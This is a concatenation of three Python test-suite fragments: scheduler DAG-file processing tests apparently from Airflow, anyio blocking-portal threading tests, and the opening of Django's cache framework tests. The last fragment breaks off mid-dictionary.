# verify that only one extra process is created
# and since a processor with 'file_1' already exists,
# even though it is first in '_file_path_queue'
# a new processor is created with 'file_2' and not 'file_1'.
processor_factory_mock.assert_called_once_with('file_2.py', [], [], False)
assert file_1 in manager._processors.keys()
assert file_2 in manager._processors.keys()
assert [file_3] == manager._file_path_queue
def test_set_file_paths_when_processor_file_path_not_in_new_file_paths(self):
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
mock_processor = MagicMock()
mock_processor.stop.side_effect = AttributeError('DagFileProcessor object has no attribute stop')
mock_processor.terminate.side_effect = None
manager._processors['missing_file.txt'] = mock_processor
manager._file_stats['missing_file.txt'] = DagFileStat(0, 0, None, None, 0)
manager.set_file_paths(['abc.txt'])
assert manager._processors == {}
def test_set_file_paths_when_processor_file_path_is_in_new_file_paths(self):
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
mock_processor = MagicMock()
mock_processor.stop.side_effect = AttributeError('DagFileProcessor object has no attribute stop')
mock_processor.terminate.side_effect = None
manager._processors['abc.txt'] = mock_processor
manager.set_file_paths(['abc.txt'])
assert manager._processors == {'abc.txt': mock_processor}
@conf_vars({("scheduler", "file_parsing_sort_mode"): "alphabetical"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
def test_file_paths_in_queue_sorted_alphabetically(
self, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""Test dag files are sorted alphabetically"""
dag_files = ["file_3.py", "file_2.py", "file_4.py", "file_1.py"]
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
manager.prepare_file_path_queue()
assert manager._file_path_queue == ['file_1.py', 'file_2.py', 'file_3.py', 'file_4.py']
@conf_vars({("scheduler", "file_parsing_sort_mode"): "random_seeded_by_host"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
def test_file_paths_in_queue_sorted_random_seeded_by_host(
self, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""Test files are randomly sorted and seeded by host name"""
dag_files = ["file_3.py", "file_2.py", "file_4.py", "file_1.py"]
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
manager.prepare_file_path_queue()
expected_order = dag_files
random.Random(get_hostname()).shuffle(expected_order)
assert manager._file_path_queue == expected_order
# Verify running it again produces same order
manager._file_paths = []
manager.prepare_file_path_queue()
assert manager._file_path_queue == expected_order
@conf_vars({("scheduler", "file_parsing_sort_mode"): "modified_time"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
@mock.patch("airflow.utils.file.os.path.getmtime")
def test_file_paths_in_queue_sorted_by_modified_time(
self, mock_getmtime, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""Test files are sorted by modified time"""
paths_with_mtime = {"file_3.py": 3.0, "file_2.py": 2.0, "file_4.py": 5.0, "file_1.py": 4.0}
dag_files = list(paths_with_mtime.keys())
mock_getmtime.side_effect = list(paths_with_mtime.values())
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
manager.prepare_file_path_queue()
assert manager._file_path_queue == ['file_4.py', 'file_1.py', 'file_3.py', 'file_2.py']
def test_find_zombies(self):
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
dagbag = DagBag(TEST_DAG_FOLDER, read_dags_from_db=False)
with create_session() as session:
session.query(LJ).delete()
dag = dagbag.get_dag('example_branch_operator')
dag.sync_to_db()
task = dag.get_task(task_id='run_this_first')
ti = TI(task, DEFAULT_DATE, State.RUNNING)
local_job = LJ(ti)
local_job.state = State.SHUTDOWN
session.add(local_job)
session.commit()
ti.job_id = local_job.id
session.add(ti)
session.commit()
manager._last_zombie_query_time = timezone.utcnow() - timedelta(
seconds=manager._zombie_threshold_secs + 1
)
manager._find_zombies() # pylint: disable=no-value-for-parameter
requests = manager._callback_to_execute[dag.full_filepath]
assert 1 == len(requests)
assert requests[0].full_filepath == dag.full_filepath
assert requests[0].msg == "Detected as zombie"
assert requests[0].is_failure_callback is True
assert isinstance(requests[0].simple_task_instance, SimpleTaskInstance)
assert ti.dag_id == requests[0].simple_task_instance.dag_id
assert ti.task_id == requests[0].simple_task_instance.task_id
assert ti.execution_date == requests[0].simple_task_instance.execution_date
session.query(TI).delete()
session.query(LJ).delete()
def test_handle_failure_callback_with_zombies_are_correctly_passed_to_dag_file_processor(self):
"""
Check that the same set of failure callback with zombies are passed to the dag
file processors until the next zombie detection logic is invoked.
"""
test_dag_path = TEST_DAG_FOLDER / 'test_example_bash_operator.py'
with conf_vars({('scheduler', 'parsing_processes'): '1', ('core', 'load_examples'): 'False'}):
dagbag = DagBag(test_dag_path, read_dags_from_db=False)
with create_session() as session:
session.query(LJ).delete()
dag = dagbag.get_dag('test_example_bash_operator')
dag.sync_to_db()
task = dag.get_task(task_id='run_this_last')
ti = TI(task, DEFAULT_DATE, State.RUNNING)
local_job = LJ(ti)
local_job.state = State.SHUTDOWN
session.add(local_job)
session.commit()
# TODO: If there was an actual Relationship between TI and Job
# we wouldn't need this extra commit
session.add(ti)
ti.job_id = local_job.id
session.commit()
expected_failure_callback_requests = [
TaskCallbackRequest(
full_filepath=dag.full_filepath,
simple_task_instance=SimpleTaskInstance(ti),
msg="Message",
)
]
test_dag_path = TEST_DAG_FOLDER / 'test_example_bash_operator.py'
child_pipe, parent_pipe = multiprocessing.Pipe()
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
fake_processors = []
def fake_processor_factory(*args, **kwargs):
nonlocal fake_processors
processor = FakeDagFileProcessorRunner._fake_dag_processor_factory(*args, **kwargs)
fake_processors.append(processor)
return processor
manager = DagFileProcessorManager(
dag_directory=test_dag_path,
max_runs=1,
processor_factory=fake_processor_factory,
processor_timeout=timedelta.max,
signal_conn=child_pipe,
dag_ids=[],
pickle_dags=False,
async_mode=async_mode,
)
self.run_processor_manager_one_loop(manager, parent_pipe)
if async_mode:
# Once for initial parse, and then again for the add_callback_to_queue
assert len(fake_processors) == 2
assert fake_processors[0]._file_path == str(test_dag_path)
assert fake_processors[0]._callback_requests == []
else:
assert len(fake_processors) == 1
assert fake_processors[-1]._file_path == str(test_dag_path)
callback_requests = fake_processors[-1]._callback_requests
assert {zombie.simple_task_instance.key for zombie in expected_failure_callback_requests} == {
result.simple_task_instance.key for result in callback_requests
}
child_pipe.close()
parent_pipe.close()
@mock.patch("airflow.jobs.scheduler_job.DagFileProcessorProcess.pid", new_callable=PropertyMock)
@mock.patch("airflow.jobs.scheduler_job.DagFileProcessorProcess.kill")
def test_kill_timed_out_processors_kill(self, mock_kill, mock_pid):
mock_pid.return_value = 1234
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta(seconds=5),
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
processor = DagFileProcessorProcess('abc.txt', False, [], [])
processor._start_time = timezone.make_aware(datetime.min)
manager._processors = {'abc.txt': processor}
manager._kill_timed_out_processors()
mock_kill.assert_called_once_with()
@mock.patch("airflow.jobs.scheduler_job.DagFileProcessorProcess.pid", new_callable=PropertyMock)
@mock.patch("airflow.jobs.scheduler_job.DagFileProcessorProcess")
def test_kill_timed_out_processors_no_kill(self, mock_dag_file_processor, mock_pid):
mock_pid.return_value = 1234
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta(seconds=5),
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
processor = DagFileProcessorProcess('abc.txt', False, [], [])
processor._start_time = timezone.make_aware(datetime.max)
manager._processors = {'abc.txt': processor}
manager._kill_timed_out_processors()
mock_dag_file_processor.kill.assert_not_called()
@conf_vars({('core', 'load_examples'): 'False'})
@pytest.mark.execution_timeout(10)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG with a system.exit() doesn't break the scheduler.
"""
# We need to _actually_ parse the files here to test the behaviour.
# Right now the parsing code lives in SchedulerJob, even though it's
# called via utils.dag_processing.
from airflow.jobs.scheduler_job import SchedulerJob
dag_id = 'exit_test_dag'
dag_directory = TEST_DAG_FOLDER.parent / 'dags_with_system_exit'
# Delete the one valid DAG/SerializedDAG, and check that it gets re-created
clear_db_dags()
clear_db_serialized_dags()
child_pipe, parent_pipe = multiprocessing.Pipe()
manager = DagFileProcessorManager(
dag_directory=dag_directory,
dag_ids=[],
max_runs=1,
processor_factory=SchedulerJob._create_dag_file_processor,
processor_timeout=timedelta(seconds=5),
signal_conn=child_pipe,
pickle_dags=False,
async_mode=True,
)
manager._run_parsing_loop()
result = None
while parent_pipe.poll(timeout=None):
result = parent_pipe.recv()
if isinstance(result, DagParsingStat) and result.done:
break
# Three files in folder should be processed
assert sum(stat.run_count for stat in manager._file_stats.values()) == 3
with create_session() as session:
assert session.query(DagModel).get(dag_id) is not None
@conf_vars({('core', 'load_examples'): 'False'})
@pytest.mark.backend("mysql", "postgres")
@pytest.mark.execution_timeout(30)
def test_pipe_full_deadlock(self):
dag_filepath = TEST_DAG_FOLDER / "test_scheduler_dags.py"
child_pipe, parent_pipe = multiprocessing.Pipe()
# Shrink the buffers to exacerbate the problem!
for fd in (parent_pipe.fileno(),):
sock = socket.socket(fileno=fd)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024)
sock.detach()
exit_event = threading.Event()
# To test this behaviour we need something that continually fills the
# parent pipe's buffer (and keeps it full).
def keep_pipe_full(pipe, exit_event):
n = 0
while True:
if exit_event.is_set():
break
req = CallbackRequest(str(dag_filepath))
try:
logging.debug("Sending CallbackRequests %d", n + 1)
pipe.send(req)
except TypeError:
# This is actually the error you get when the parent pipe
# is closed! Nicely handled, eh?
break
except OSError:
break
n += 1
logging.debug(" Sent %d CallbackRequests", n)
thread = threading.Thread(target=keep_pipe_full, args=(parent_pipe, exit_event))
fake_processors = []
def fake_processor_factory(*args, **kwargs):
nonlocal fake_processors
processor = FakeDagFileProcessorRunner._fake_dag_processor_factory(*args, **kwargs)
fake_processors.append(processor)
return processor
manager = DagFileProcessorManager(
dag_directory=dag_filepath,
dag_ids=[],
# A reasonable large number to ensure that we trigger the deadlock
max_runs=100,
processor_factory=fake_processor_factory,
processor_timeout=timedelta(seconds=5),
signal_conn=child_pipe,
pickle_dags=False,
async_mode=True,
)
try:
thread.start()
# If this completes without hanging, then the test is good!
manager._run_parsing_loop()
exit_event.set()
finally:
logging.info("Closing pipes")
parent_pipe.close()
child_pipe.close()
thread.join(timeout=1.0)
class TestDagFileProcessorAgent(unittest.TestCase):
def setUp(self):
# Make sure that the configure_logging is not cached
self.old_modules = dict(sys.modules)
def tearDown(self):
# Remove any new modules imported during the test run. This lets us
# import the same source files for more than one test.
remove_list = []
for mod in sys.modules:
if mod not in self.old_modules:
remove_list.append(mod)
for mod in remove_list:
del sys.modules[mod]
@staticmethod
def _processor_factory(file_path, zombies, dag_ids, pickle_dags):
return DagFileProcessorProcess(file_path, pickle_dags, dag_ids, zombies)
def test_reload_module(self):
"""
Configure the context to have logging.logging_config_class set to a fake logging
class path, thus when reloading logging module the airflow.processor_manager
logger should not be configured.
"""
with settings_context(SETTINGS_FILE_VALID):
# Launch a process through DagFileProcessorAgent, which will try
# reload the logging module.
test_dag_path = TEST_DAG_FOLDER / 'test_scheduler_dags.py'
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
log_file_loc = conf.get('logging', 'DAG_PROCESSOR_MANAGER_LOG_LOCATION')
try:
os.remove(log_file_loc)
except OSError:
pass
# Starting dag processing with 0 max_runs to avoid redundant operations.
processor_agent = DagFileProcessorAgent(
test_dag_path, 0, type(self)._processor_factory, timedelta.max, [], False, async_mode
)
processor_agent.start()
if not async_mode:
processor_agent.run_single_parsing_loop()
processor_agent._process.join()
# Since we are reloading logging config not creating this file,
# we should expect it to be nonexistent.
assert not os.path.isfile(log_file_loc)
@conf_vars({('core', 'load_examples'): 'False'})
def test_parse_once(self):
clear_db_serialized_dags()
clear_db_dags()
test_dag_path = TEST_DAG_FOLDER / 'test_scheduler_dags.py'
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
processor_agent = DagFileProcessorAgent(
test_dag_path, 1, type(self)._processor_factory, timedelta.max, [], False, async_mode
)
processor_agent.start()
if not async_mode:
processor_agent.run_single_parsing_loop()
while not processor_agent.done:
if not async_mode:
processor_agent.wait_until_finished()
processor_agent.heartbeat()
assert processor_agent.all_files_processed
assert processor_agent.done
with create_session() as session:
dag_ids = session.query(DagModel.dag_id).order_by("dag_id").all()
assert dag_ids == [('test_start_date_scheduling',), ('test_task_start_date_scheduling',)]
dag_ids = session.query(SerializedDagModel.dag_id).order_by("dag_id").all()
assert dag_ids == [('test_start_date_scheduling',), ('test_task_start_date_scheduling',)]
def test_launch_process(self):
test_dag_path = TEST_DAG_FOLDER / 'test_scheduler_dags.py'
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
log_file_loc = conf.get('logging', 'DAG_PROCESSOR_MANAGER_LOG_LOCATION')
try:
os.remove(log_file_loc)
except OSError:
pass
# Starting dag processing with 0 max_runs to avoid redundant operations.
processor_agent = DagFileProcessorAgent(
test_dag_path, 0, type(self)._processor_factory, timedelta.max, [], False, async_mode
)
processor_agent.start()
if not async_mode:
processor_agent.run_single_parsing_loop()
processor_agent._process.join()
assert os.path.isfile(log_file_loc)
|
test_from_thread.py
|
import sys
import threading
import time
from concurrent.futures import CancelledError
from contextlib import suppress
from typing import Any, Dict, List, NoReturn, Optional
import pytest
from anyio import (
Event, from_thread, get_cancelled_exc_class, get_current_task, run, sleep, to_thread,
wait_all_tasks_blocked)
from anyio.abc import TaskStatus
from anyio.from_thread import BlockingPortal, start_blocking_portal
if sys.version_info >= (3, 8):
from typing import Literal
else:
from typing_extensions import Literal
pytestmark = pytest.mark.anyio
class TestRunAsyncFromThread:
async def test_run_async_from_thread(self) -> None:
async def add(a: int, b: int) -> int:
assert threading.get_ident() == event_loop_thread_id
return a + b
def worker(a: int, b: int) -> int:
assert threading.get_ident() != event_loop_thread_id
return from_thread.run(add, a, b)
event_loop_thread_id = threading.get_ident()
result = await to_thread.run_sync(worker, 1, 2)
assert result == 3
async def test_run_sync_from_thread(self) -> None:
def add(a: int, b: int) -> int:
assert threading.get_ident() == event_loop_thread_id
return a + b
def worker(a: int, b: int) -> int:
assert threading.get_ident() != event_loop_thread_id
return from_thread.run_sync(add, a, b)
event_loop_thread_id = threading.get_ident()
result = await to_thread.run_sync(worker, 1, 2)
assert result == 3
def test_run_sync_from_thread_pooling(self) -> None:
async def main() -> None:
thread_ids = set()
for _ in range(5):
thread_ids.add(await to_thread.run_sync(threading.get_ident))
# Expects that all the work has been done in the same worker thread
assert len(thread_ids) == 1
assert thread_ids.pop() != threading.get_ident()
assert threading.active_count() == initial_count + 1
# The thread should not exist after the event loop has been closed
initial_count = threading.active_count()
run(main, backend='asyncio')
for _ in range(10):
if threading.active_count() == initial_count:
return
time.sleep(0.1)
pytest.fail('Worker thread did not exit within 1 second')
async def test_run_async_from_thread_exception(self) -> None:
async def add(a: int, b: int) -> int:
assert threading.get_ident() == event_loop_thread_id
return a + b
def worker(a: int, b: int) -> int:
assert threading.get_ident() != event_loop_thread_id
return from_thread.run(add, a, b)
event_loop_thread_id = threading.get_ident()
with pytest.raises(TypeError) as exc:
await to_thread.run_sync(worker, 1, 'foo')
exc.match("unsupported operand type")
async def test_run_sync_from_thread_exception(self) -> None:
def add(a: int, b: int) -> int:
assert threading.get_ident() == event_loop_thread_id
return a + b
def worker(a: int, b: int) -> int:
assert threading.get_ident() != event_loop_thread_id
return from_thread.run_sync(add, a, b)
event_loop_thread_id = threading.get_ident()
with pytest.raises(TypeError) as exc:
await to_thread.run_sync(worker, 1, 'foo')
exc.match("unsupported operand type")
async def test_run_anyio_async_func_from_thread(self) -> None:
def worker(*args: int) -> Literal[True]:
from_thread.run(sleep, *args)
return True
assert await to_thread.run_sync(worker, 0)
def test_run_async_from_unclaimed_thread(self) -> None:
async def foo() -> None:
pass
exc = pytest.raises(RuntimeError, from_thread.run, foo)
exc.match('This function can only be run from an AnyIO worker thread')
class TestRunSyncFromThread:
def test_run_sync_from_unclaimed_thread(self) -> None:
def foo() -> None:
pass
exc = pytest.raises(RuntimeError, from_thread.run_sync, foo)
exc.match('This function can only be run from an AnyIO worker thread')
class TestBlockingPortal:
class AsyncCM:
def __init__(self, ignore_error: bool):
self.ignore_error = ignore_error
async def __aenter__(self) -> Literal["test"]:
return 'test'
async def __aexit__(self, exc_type: object, exc_val: object, exc_tb: object) -> bool:
return self.ignore_error
async def test_successful_call(self) -> None:
async def async_get_thread_id() -> int:
return threading.get_ident()
def external_thread() -> None:
thread_ids.append(portal.call(threading.get_ident))
thread_ids.append(portal.call(async_get_thread_id))
thread_ids: List[int] = []
async with BlockingPortal() as portal:
thread = threading.Thread(target=external_thread)
thread.start()
await to_thread.run_sync(thread.join)
for thread_id in thread_ids:
assert thread_id == threading.get_ident()
async def test_aexit_with_exception(self) -> None:
"""Test that when the portal exits with an exception, all tasks are cancelled."""
def external_thread() -> None:
try:
portal.call(sleep, 3)
except BaseException as exc:
results.append(exc)
else:
results.append(None)
results: List[Optional[BaseException]] = []
with suppress(Exception):
async with BlockingPortal() as portal:
thread1 = threading.Thread(target=external_thread)
thread1.start()
thread2 = threading.Thread(target=external_thread)
thread2.start()
await sleep(0.1)
assert not results
raise Exception
await to_thread.run_sync(thread1.join)
await to_thread.run_sync(thread2.join)
assert len(results) == 2
assert isinstance(results[0], CancelledError)
assert isinstance(results[1], CancelledError)
async def test_aexit_without_exception(self) -> None:
"""Test that when the portal exits, it waits for all tasks to finish."""
def external_thread() -> None:
try:
portal.call(sleep, 0.2)
except BaseException as exc:
results.append(exc)
else:
results.append(None)
results: List[Optional[BaseException]] = []
async with BlockingPortal() as portal:
thread1 = threading.Thread(target=external_thread)
thread1.start()
thread2 = threading.Thread(target=external_thread)
thread2.start()
await sleep(0.1)
assert not results
await to_thread.run_sync(thread1.join)
await to_thread.run_sync(thread2.join)
assert results == [None, None]
async def test_call_portal_from_event_loop_thread(self) -> None:
async with BlockingPortal() as portal:
exc = pytest.raises(RuntimeError, portal.call, threading.get_ident)
exc.match('This method cannot be called from the event loop thread')
def test_start_with_new_event_loop(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
async def async_get_thread_id() -> int:
return threading.get_ident()
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
thread_id = portal.call(async_get_thread_id)
assert isinstance(thread_id, int)
assert thread_id != threading.get_ident()
def test_start_with_nonexistent_backend(self) -> None:
with pytest.raises(LookupError) as exc:
with start_blocking_portal('foo'):
pass
exc.match('No such backend: foo')
def test_call_stopped_portal(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
pass
pytest.raises(RuntimeError, portal.call, threading.get_ident).\
match('This portal is not running')
def test_start_task_soon(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
async def event_waiter() -> Literal["test"]:
await event1.wait()
event2.set()
return 'test'
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
event1 = portal.call(Event)
event2 = portal.call(Event)
future = portal.start_task_soon(event_waiter)
portal.call(event1.set)
portal.call(event2.wait)
assert future.result() == 'test'
def test_start_task_soon_cancel_later(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
async def noop() -> None:
await sleep(2)
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
future = portal.start_task_soon(noop)
portal.call(wait_all_tasks_blocked)
future.cancel()
assert future.cancelled()
def test_start_task_soon_cancel_immediately(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
cancelled = False
async def event_waiter() -> None:
nonlocal cancelled
try:
await sleep(3)
except get_cancelled_exc_class():
cancelled = True
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
future = portal.start_task_soon(event_waiter)
future.cancel()
assert cancelled
def test_start_task_soon_with_name(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
task_name = None
async def taskfunc() -> None:
nonlocal task_name
task_name = get_current_task().name
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
portal.start_task_soon(taskfunc, name='testname')
assert task_name == 'testname'
def test_async_context_manager_success(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
with portal.wrap_async_context_manager(TestBlockingPortal.AsyncCM(False)) as cm:
assert cm == 'test'
def test_async_context_manager_error(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
with pytest.raises(Exception) as exc:
with portal.wrap_async_context_manager(TestBlockingPortal.AsyncCM(False)) as cm:
assert cm == 'test'
raise Exception('should NOT be ignored')
exc.match('should NOT be ignored')
def test_async_context_manager_error_ignore(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
with portal.wrap_async_context_manager(TestBlockingPortal.AsyncCM(True)) as cm:
assert cm == 'test'
raise Exception('should be ignored')
def test_start_no_value(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
def taskfunc(*, task_status: TaskStatus) -> None:
task_status.started()
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
future, value = portal.start_task(taskfunc) # type: ignore[arg-type]
assert value is None
assert future.result() is None
def test_start_with_value(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
def taskfunc(*, task_status: TaskStatus) -> None:
task_status.started('foo')
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
future, value = portal.start_task(taskfunc) # type: ignore[arg-type]
assert value == 'foo'
assert future.result() is None
def test_start_crash_before_started_call(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
def taskfunc(*, task_status: object) -> NoReturn:
raise Exception('foo')
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
with pytest.raises(Exception, match='foo'):
portal.start_task(taskfunc)
def test_start_crash_after_started_call(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
def taskfunc(*, task_status: TaskStatus) -> NoReturn:
task_status.started(2)
raise Exception('foo')
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
future, value = portal.start_task(taskfunc)
assert value == 2
with pytest.raises(Exception, match='foo'):
future.result()
def test_start_no_started_call(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
def taskfunc(*, task_status: TaskStatus) -> None:
pass
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
with pytest.raises(RuntimeError, match='Task exited'):
portal.start_task(taskfunc) # type: ignore[arg-type]
def test_start_with_name(self, anyio_backend_name: str,
anyio_backend_options: Dict[str, Any]) -> None:
def taskfunc(*, task_status: TaskStatus) -> None:
task_status.started(get_current_task().name)
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
future, start_value = portal.start_task(
taskfunc, name='testname') # type: ignore[arg-type]
assert start_value == 'testname'
|
tests.py
|
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
import copy
import io
import os
import pickle
import re
import shutil
import sys
import tempfile
import threading
import time
import unittest
from pathlib import Path
from unittest import mock, skipIf
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheHandler, CacheKeyWarning, InvalidCacheKey, cache,
caches,
)
from django.core.cache.backends.base import InvalidCacheBackendError
from django.core.cache.backends.redis import RedisCacheClient
from django.core.cache.utils import make_template_fragment_key
from django.db import close_old_connections, connection, connections
from django.db.backends.utils import CursorWrapper
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse,
)
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
override_settings,
)
from django.test.signals import setting_changed
from django.test.utils import CaptureQueriesContext
from django.utils import timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control, patch_vary_headers,
)
from django.views.decorators.cache import cache_control, cache_page
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable:
def __getstate__(self):
raise pickle.PickleError()
def empty_response(request):
return HttpResponse()
KEY_ERRORS_WITH_MEMCACHED_MSG = (
'Cache key contains characters that will cause errors if used with '
'memcached: %r'
)
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
self.assertIs(cache.add("addkey1", "value"), True)
self.assertIs(cache.add("addkey1", "newvalue"), True)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Nonexistent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_get_many_invalid_key(self):
msg = KEY_ERRORS_WITH_MEMCACHED_MSG % ':1:key with spaces'
with self.assertWarnsMessage(CacheKeyWarning, msg):
cache.get_many(['key with spaces'])
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertIsNone(cache.get("key1"))
self.assertIs(cache.delete("key1"), False)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertIs(cache.has_key("hello1"), False)
self.assertIs(cache.has_key("goodbye1"), False)
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr('answer')
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
with self.assertRaises(ValueError):
cache.incr('does_not_exist', -1)
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr('answer')
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
with self.assertRaises(ValueError):
cache.decr('does_not_exist', -1)
def test_touch(self):
"""Dummy cache can't do touch()."""
self.assertIs(cache.touch('whatever'), False)
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
self.assertIs(cache.add("expire2", "newvalue"), True)
self.assertIsNone(cache.get("expire2"))
self.assertIs(cache.has_key("expire3"), False)
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
